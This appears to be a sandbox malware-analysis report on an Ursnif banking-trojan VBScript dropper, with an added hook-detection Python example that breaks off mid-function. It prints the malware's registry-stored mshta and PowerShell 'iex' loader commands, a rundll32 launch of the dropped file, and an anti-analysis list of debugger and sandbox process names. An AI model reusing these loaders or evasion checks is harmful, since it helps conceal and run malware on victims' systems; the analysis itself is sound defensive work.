40_2_00000195D8AB76F4
Note: the functions recovered from powershell.exe, control.exe and the 64-bit rundll32.exe sit at identical offsets from their respective base addresses (for example 31_2_000002174F3EE95C, 38_2_000CE95C and 40_2_00000195D8ACE95C all lie 0x1E95C above 000002174F3D0000, 000B0000 and 00000195D8AB0000), which is consistent with one injected module mapped at a different base in each host process; those three bases are the Yara-matched memory regions listed above.
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8ACC6C440_2_00000195D8ACC6C4
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8AC2EC040_2_00000195D8AC2EC0
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8ACA9F840_2_00000195D8ACA9F8
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8AB361040_2_00000195D8AB3610
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8ACBA7440_2_00000195D8ACBA74
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8AEF5CC40_2_00000195D8AEF5CC
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_0557E6B4 CreateProcessAsUserA
                    Source: 345678.vbs | Initial sample: Strings found which are bigger than 50
                    Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                    Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\fum.cpp 8C5BA29FBEEDF62234916D84F3A857A3B086871631FD87FABDFC0818CF049587
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_00E540DC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_00E56EB3 GetProcAddress,NtCreateSection,memset
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_00E57666 NtMapViewOfSection
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_00E58055 NtQueryVirtualMemory
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_0558B58C NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_0558A71C NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_055737F6 HeapFree,memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_0558F7F5 NtQueryInformationProcess
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_0559079B GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05586657 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05580E3E NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_055909D7 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_0558B878 GetProcAddress,NtCreateSection,memset
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05585878 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_0558A8F7 NtMapViewOfSection
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05588890 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05579D36 NtGetContextThread,RtlNtStatusToDosError
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_055855D6 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05580CEF NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_0557579C NtQuerySystemInformation,RtlNtStatusToDosError
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05580FBD memset,NtQueryInformationProcess
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05575166 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_0558FBB9 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05590BAB NtQueryInformationThread,GetLastError,RtlNtStatusToDosError
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3E8B90 NtMapViewOfSection
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3E5B80 NtCreateSection
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3EE95C NtSetContextThread,NtUnmapViewOfSection
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3E1950 NtWriteVirtualMemory
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3EE860 NtQueryInformationProcess
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3F20A4 NtQueryInformationToken,NtQueryInformationToken
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3FA8F0 NtSetInformationProcess,CreateRemoteThread,ResumeThread
                    Source: C:\Windows\System32\control.exe | Code function: 38_2_000CE860 NtQueryInformationProcess
                    Source: C:\Windows\System32\control.exe | Code function: 38_2_000D20A4 NtQueryInformationToken,NtQueryInformationToken,NtClose
                    Source: C:\Windows\System32\control.exe | Code function: 38_2_000DA8F0 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification
                    Source: C:\Windows\System32\control.exe | Code function: 38_2_000DD110 RtlAllocateHeap,NtQueryInformationProcess
                    Source: C:\Windows\System32\control.exe | Code function: 38_2_000CE95C NtSetContextThread,NtUnmapViewOfSection,NtClose
                    Source: C:\Windows\System32\control.exe | Code function: 38_2_000C1950 NtWriteVirtualMemory
                    Source: C:\Windows\System32\control.exe | Code function: 38_2_000C5B80 NtCreateSection
                    Source: C:\Windows\System32\control.exe | Code function: 38_2_000C8B90 NtMapViewOfSection
                    Source: C:\Windows\System32\control.exe | Code function: 38_2_000BFCA8 NtAllocateVirtualMemory
                    Source: C:\Windows\System32\control.exe | Code function: 38_2_000B4580 NtReadVirtualMemory
                    Source: C:\Windows\System32\control.exe | Code function: 38_2_000EF004 NtProtectVirtualMemory,NtProtectVirtualMemory
                    Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8AD20A4 NtQueryInformationToken,NtQueryInformationToken,NtClose
                    Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8ACE860 NtQueryInformationProcess
                    Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8AEF004 NtProtectVirtualMemory,NtProtectVirtualMemory
                    Source: wyozc5bn.dll.35.dr | Static PE information: No import functions for PE file found
                    Source: uitt4j30.dll.33.dr | Static PE information: No import functions for PE file found
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\Documents\20210910
                    Source: classification engine | Classification label: mal100.bank.troj.evad.winVBS@29/21@5/1
                    Source: C:\Windows\System32\mshta.exe | File read: C:\Users\user\Desktop\desktop.ini
                    Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\345678.vbs'
                    Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknown | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
                    Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
                    Source: unknown | Process created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
                    Source: unknown | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Rm6e='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Rm6e).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
                    Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.cmdline'
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES36.tmp' 'c:\Users\user\AppData\Local\Temp\uitt4j30\CSC1FA535E1192D4199A0DB18CBAD2D0A9.TMP'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wyozc5bn\wyozc5bn.cmdline'
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCC9.tmp' 'c:\Users\user\AppData\Local\Temp\wyozc5bn\CSC8A734EFC87854564869CBAF05337FE1.TMP'
                    Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                    Source: C:\Windows\System32\control.exe | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                    Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\76A9.bi1'
                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
                    Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
                    Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
                    Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                    Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
                    Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\adobe.url
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_00E52102 CreateToolhelp32Snapshot,Process32First,StrStrIA,Process32Next,CloseHandle
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
                    Source: C:\Windows\SysWOW64\rundll32.exe | Mutant created: \Sessions\1\BaseNamedObjects\{DE70903F-A522-C073-1FF2-A9F4C346ED68}
                    Source: C:\Windows\System32\control.exe | Mutant created: \Sessions\1\BaseNamedObjects\{965F7604-FD91-382B-372A-81EC5BFE45E0}
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2424:120:WilError_01
                    Source: C:\Windows\System32\rundll32.exe | Mutant created: \Sessions\1\BaseNamedObjects\{BA6EB6AE-D1AE-FC19-2B8E-95F08FA29924}
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7044:120:WilError_01
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\{5AA57996-F134-9CA9-4B2E-B590AF42B9C4}
                    Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                    Source: Window Recorder | Window detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                    Source: 345678.vbs | Static file information: File size 1397341 > 1048576
                    Source: Binary string: 8C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.pdb@ source: powershell.exe, 0000001F.00000002.777223322.0000021753319000.00000004.00000001.sdmp
                    Source: Binary string: 8C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.pdbXP+s source: powershell.exe, 0000001F.00000002.777223322.0000021753319000.00000004.00000001.sdmp
                    Source: Binary string: c:\Led-Flower\Spell\cotton_point\please.pdb source: wscript.exe, 00000001.00000003.535291067.000001763BDE4000.00000004.00000001.sdmp, fum.cpp.1.dr
                    Source: Binary string: ntdll.pdb source: rundll32.exe, 00000015.00000003.679916325.0000000005A50000.00000004.00000001.sdmp
                    Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000015.00000003.679916325.0000000005A50000.00000004.00000001.sdmp

                    Data Obfuscation:

                    VBScript performs obfuscated calls to suspicious functions
                    Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: WScript.Sleep Int((Theodosian-AFQ+1)*Rnd+AFQ)REM diary character casework. 6326440 Fayetteville flaxen Doolittle Ballard backpack Alcoa loyal offertory Nicaragua axe Toni End WithEAX = MsgBox("Cant start because MSVCR101.dll is missing from your computer. Try reinstalling the program to fix this problem.", vbSystemModal+vbCritical, "System Error")Gnk("DEBUG: F_MESSAGE - True")REM bow megabyte plenitude aspirate stationery. handicapper nit frozen restaurateur Tennessee Millikan hark limerick Macedon camel Brandon hereunto disquisition plasm anatomic End FunctionFunction yNzk()Gnk("DEBUG: FS_PROCESS - Start")REM emboss indigestion surly rebuttal Kaskaskia upslope lightface stimulus vintner tabernacle male shy inhibit bravado mozzarella otherwise Gnk("DEBUG: FS_PROCESSCOUNT - Start")on error resume nextDim Theodosian,AFQTheodosian=6000' elongate conjoin protactinium monocular warplane riot rubidium bebop skyward contributory metabole stepchild lenticular rich fleabane Frisian AFQ=3000Randomize' thieving Kurt sovereign Simpson, anthropomorphic rhombic Monica loan transpose larch least farmhouse mercuric, tabletop hoosegow highboy camelopard WScript.Sleep Int((Theodosian-AFQ+1)*Rnd+AFQ)yDVFproc = ((((42 + (-27.0)) + 343.0) - 276.0) + (-82.0))wSQ = 
Array("frida-winjector-helper-64.exe","frida-winjector-helper-32.exe","pythonw.exe","pyw.exe","cmdvirth.exe","alive.exe","filewatcherservice.exe","ngvmsvc.exe","sandboxierpcss.exe","analyzer.exe","fortitracer.exe","nsverctl.exe","sbiectrl.exe","angar2.exe","goatcasper.exe","ollydbg.exe","sbiesvc.exe","apimonitor.exe","GoatClientApp.exe","peid.exe","scanhost.exe","apispy.exe","hiew32.exe","perl.exe","scktool.exe","apispy32.exe","hookanaapp.exe","petools.exe","sdclt.exe","asura.exe","hookexplorer.exe","pexplorer.exe","sftdcc.exe","autorepgui.exe","httplog.exe","ping.exe","shutdownmon.exe","autoruns.exe","icesword.exe","pr0c3xp.exe","sniffhit.exe","autorunsc.exe","iclicker-release.exe",".exe","prince.exe","snoop.exe","autoscreenshotter.exe","idag.exe","procanalyzer.exe","spkrmon.exe","avctestsuite.exe","idag64.exe","processhacker.exe","sysanalyzer.exe","avz.exe","idaq.exe","processmemdump.exe","syser.exe","behaviordumper.exe","immunitydebugger.exe","procexp.exe","systemexplorer.exe","bindiff.exe","importrec.exe","procexp64.exe","systemexplorerservice.exe","BTPTrayIcon.exe","imul.exe","procmon.exe","sython.exe","capturebat.exe","Infoclient.exe","procmon64.exe","taskmgr.exe","cdb.exe","installrite.exe","python.exe","taslogin.exe","ipfs.exe","pythonw.exe","tcpdump.exe","clicksharelauncher.exe","iprosetmonitor.exe","qq.exe","tcpview.exe","closepopup.exe","iragent.exe","qqffo.exe","timeout.exe","commview.exe","iris.exe","qqprotect.exe","totalcmd.exe","cports.exe","joeboxcontrol.exe","qqsg.exe","trojdie.kvpcrossfire.exe","joeboxserver.exe","raptorclient.exe","txplatform.exe","dnf.exe","lamer.exe","regmon.exe","virus.exe","dsniff.exe","LogHTTP.exe","regshot.exe","vx.exe","dumpcap.exe","lordpe.exe","RepMgr64.exe","win
                    Suspicious powershell command line found
                    Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_00E57AB0 push ecx; ret 21_2_00E57AB9
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_00E57E1F push ecx; ret 21_2_00E57E2F
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_055876C0 push ss; ret 21_2_055876C1
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05594EE0 push ecx; ret 21_2_05594EE9
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_0559528F push ecx; ret 21_2_0559529F
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3DC6E9 push 3B000001h; retf 31_2_000002174F3DC6EE
                    Source: C:\Windows\System32\control.exe | Code function: 38_2_000BC6E9 push 3B000001h; retf 38_2_000BC6EE
                    Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8ABC6E9 push 3B000001h; retf 40_2_00000195D8ABC6EE
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05585529 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.cmdline'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wyozc5bn\wyozc5bn.cmdline'

                    Persistence and Installation Behavior:

                    Creates processes via WMI
                    Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
                    Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\fum.cpp
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\wyozc5bn\wyozc5bn.dll

                    Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match | File source: 00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.614926356.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.615093761.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000002.756395478.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000003.693266563.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.615032567.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000027.00000002.798196126.000002413C902000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.615070826.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000003.693369864.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.622629289.0000000004FBC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000003.754195346.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.615054259.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.615001343.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.615108911.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.614962724.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000003.693393885.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000003.754218301.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000002.758341683.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.618072747.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000003.740363457.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000003.754002783.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6072, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: control.exe PID: 2896, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 4612, type: MEMORYSTR
Source: Yara match | File source: 21.3.rundll32.exe.50ba4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.3.rundll32.exe.50ba4a0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.3.rundll32.exe.5168d48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.3.rundll32.exe.51394a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000026.00000000.689267141.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000000.752570656.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.620983509.0000000005139000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000027.00000002.798303359.000002413CA11000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000000.690928250.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.741515734.0000000004E3F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000000.692180683.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000000.743168465.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.620941677.00000000050BA000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000000.745515956.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.781275414.000002175F5E8000.00000004.00000001.sdmp, type: MEMORY
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe | IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Deletes itself after installation
Source: C:\Windows\System32\wscript.exe | File deleted: c:\users\user\desktop\345678.vbs
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe | EAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFA9B33521C
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe | User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe | IAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFA9B335200
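Offline triage for the three hook classes flagged above (export pointer, function prolog, import pointer), as an added example that is neither the report's nor the sandbox vendor's code. It works on bytes and address ranges already dumped from the target process, so every address, module range and prolog in it is constructed for illustration; the report's own addresses are not used because the page does not give the module layout they belong to.

```python
"""Classify user-mode hooks from dumped prolog bytes and resolved EAT/IAT pointers.
Added example; all addresses, ranges and byte strings below are constructed."""
import struct
from typing import Dict, Optional, Tuple

MASK64 = (1 << 64) - 1


def classify_trampoline(code: bytes, va: int) -> Optional[Tuple[str, Optional[int]]]:
    """Recognise common x64 inline-hook stubs at the start of `code`, which
    lives at virtual address `va`.  Returns (kind, target) or None.  For the
    rip-relative form the second element is the pointer slot, because the
    real target has to be read from memory at that slot."""
    if len(code) >= 5 and code[0] == 0xE9:                       # jmp rel32
        rel = struct.unpack_from("<i", code, 1)[0]
        return "jmp rel32", (va + 5 + rel) & MASK64
    if len(code) >= 2 and code[0] == 0xEB:                       # jmp rel8 (hot-patch style)
        rel = struct.unpack_from("<b", code, 1)[0]
        return "jmp rel8", (va + 2 + rel) & MASK64
    if len(code) >= 6 and code[:2] == b"\xFF\x25":               # jmp qword ptr [rip+disp32]
        disp = struct.unpack_from("<i", code, 2)[0]
        return "jmp [rip+disp32]", (va + 6 + disp) & MASK64
    if len(code) >= 6 and code[0] == 0x68 and code[5] == 0xC3:   # push imm32; ret
        return "push imm32; ret", struct.unpack_from("<I", code, 1)[0]
    if len(code) >= 12 and code[:2] == b"\x48\xB8" and code[10:12] == b"\xFF\xE0":
        return "mov rax, imm64; jmp rax", struct.unpack_from("<Q", code, 2)[0]
    return None


def check_prolog(on_disk: bytes, in_memory: bytes, function_va: int) -> Dict:
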